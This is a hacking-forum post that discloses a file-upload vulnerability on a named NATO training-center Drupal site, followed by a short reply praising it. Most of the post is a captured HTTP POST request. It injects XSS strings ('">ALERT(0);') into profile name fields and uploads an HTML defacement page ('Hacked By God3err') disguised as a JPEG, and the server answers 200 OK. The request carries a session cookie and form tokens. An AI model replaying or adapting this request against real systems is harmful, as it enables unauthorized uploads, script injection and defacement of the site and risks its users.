NATO Training Center Upload Vulnerability //God3err

God3err

Spys-Z | Joined: 5 Aug 2015 | Messages: 334 | Reaction score: 0 | Points: 0 | Age: 58
This was reported to the relevant parties, but no response has been received in 40 days!

[hide]
[font=Verdana, Arial, Helvetica, sans-serif][font=Monaco, monospace, Courier]NATO Upload Vulnerability
----------------------------------------------------------------
Site: https://events.jftc.nato.int
----------------------------------------------------------------
Videos :
----------------------------------------------------------------
Vulnerable POST Code :
----------------------------------------------------------------
17:28:39.016
[4438ms]
[total 4438ms]
Status: 200[OK]

POST https://events.jftc.nato.int/user/2...ormat=drupal_ajax&_wrapper_format=drupal_ajax
Load Flags[LOAD_BACKGROUND  LOAD_BYPASS_LOCAL_CACHE  ]
Content Size[-1]
Mime Type[application/json]
 
Request Headers:
     Host[events.jftc.nato.int]
     User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.7.2]
     Accept[application/json, text/javascript, */*; q=0.01]
     Accept-Language[en-US,en;q=0.5]
     Accept-Encoding[gzip, deflate, br]
     X-Requested-With[XMLHttpRequest]
     Referer[https://events.jftc.nato.int/user/26426/userdata]
     Content-Length[7132]
     Content-Type[multipart/form-data; boundary=---------------------------23222661824199]
     Cookie[SSESS15be87fcc393b12e70eb4c4f98ed97bc=yV8zL34h9yB25fKnjwRcU6TDMwW6JnpCKenpm1T6ghA]
     Connection[keep-alive]
 
Post Data:

   
POST_DATA[-----------------------------23222661824199
Content-Disposition: form-data; name="name"


-----------------------------23222661824199
Content-Disposition: form-data; name="first_name"

">ALERT(0);
-----------------------------23222661824199
Content-Disposition: form-data; name="surname"

">ALERT(0);
-----------------------------23222661824199
Content-Disposition: form-data; name="gender"

F
-----------------------------23222661824199
Content-Disposition: form-data; name="nato_rank_title"

OR3
-----------------------------23222661824199
Content-Disposition: form-data; name="national_title"

TUR
-----------------------------23222661824199
Content-Disposition: form-data; name="service"

ARMY
-----------------------------23222661824199
Content-Disposition: form-data; name="nationality"

Turkey (TUR)
-----------------------------23222661824199
Content-Disposition: form-data; name="id_number"

1213123123123
-----------------------------23222661824199
Content-Disposition: form-data; name="nato_security_clearance"

NATO Secret
-----------------------------23222661824199
Content-Disposition: form-data; name="organization[select]"

1 GNC
-----------------------------23222661824199
Content-Disposition: form-data; name="organization[other]"


-----------------------------23222661824199
Content-Disposition: form-data; name="contact_phone"

05********
-----------------------------23222661824199
Content-Disposition: form-data; name="ns_wan_address"

safasfasf
-----------------------------23222661824199
Content-Disposition: form-data; name="files[user_picture]"; filename="index.jpg"
Content-Type: image/jpeg

<html><h1>Hacked By God3err<h1></html>
-----------------------------23222661824199
Content-Disposition: form-data; name="user_picture[fids]"


-----------------------------23222661824199
Content-Disposition: form-data; name="security_clearance_fid[fids]"

6741
-----------------------------23222661824199
Content-Disposition: form-data; name="height"

168
-----------------------------23222661824199
Content-Disposition: form-data; name="eye_color"

Blue
-----------------------------23222661824199
Content-Disposition: form-data; name="marital_status"

married
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_date"

1974-05-06
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_town"

burdur
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_country"

Afghanistan (AFG)
-----------------------------23222661824199
Content-Disposition: form-data; name="form_build_id"

form-vx5EXbx7djtg3TbaVszCcjOGLwqKe4DIHifWokHwsbY
-----------------------------23222661824199
Content-Disposition: form-data; name="form_token"

AsFqzDYst8b5UPULTTcOzKKSHtro8GetqNghSR9N-y8
-----------------------------23222661824199
Content-Disposition: form-data; name="form_id"

simple_form
-----------------------------23222661824199
Content-Disposition: form-data; name="_triggering_element_name"

user_picture_upload_button
-----------------------------23222661824199
Content-Disposition: form-data; name="_triggering_element_value"

Upload
-----------------------------23222661824199
Content-Disposition: form-data; name="_drupal_ajax"

1
-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[theme]"

bstheme
-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[theme_token]"


-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[libraries]"

autologout/drupal.autologout,bootstrap/popover,bootstrap/tooltip,bstheme/bootstrap-scripts,bstheme/global-styling,core/drupal.active-link,core/drupal.date,core/drupal.states,core/html5shiv,core/jquery.form,core/jquery.form,d_filtertable/filtertable,d_signup/signup_registrant_info_sticky,d_signup/signup_select_row,file/drupal.file,file/drupal.file,hide_submit/hide_submit,system/base
-----------------------------23222661824199--
]
  Response Headers:
     Server[nginx]
     Date[Tue, 08 May 2018 14:28:43 GMT]
     Content-Type[application/json]
     Cache-Control[must-revalidate, no-cache, private]
     x-ua-compatible[IE=edge]
     Content-Language[en]
     X-Content-Type-Options[nosniff]
     X-Frame-Options[SAMEORIGIN]
     Expires[Sun, 19 Nov 1978 05:00:00 GMT]
     Vary[Accept-Encoding]
     x-generator[Drupal 8 (https://www.drupal.org)]
     x-drupal-ajax-token[1]
     Content-Encoding[gzip]
     x-request-id[v-1bf98b42-52cc-11e8-903d-22000a271e78]
     x-ah-environment[prod]
     x-varnish[713984183]
     Age[0]
     via[1.1 varnish-v4]
     X-Cache[MISS]
     Accept-Ranges[bytes]
     X-Firefox-Spdy[h2]
------------------------------------------------------------------------
//God3err - Thanks For Reading
------------------------------------------------------------------------
Twitter : @KizilKullanici
------------------------------------------------------------------------
☭ God3err ☭
------------------------------------------------------------------------
[/font]


[/font]
[/hide]
 

dork

Spys-Z | Joined: 14 Sep 2013 | Messages: 263 | Reaction score: 0 | Points: 0
Well done, brother, thank you.
 

Copyright® Ajanlar.org 2012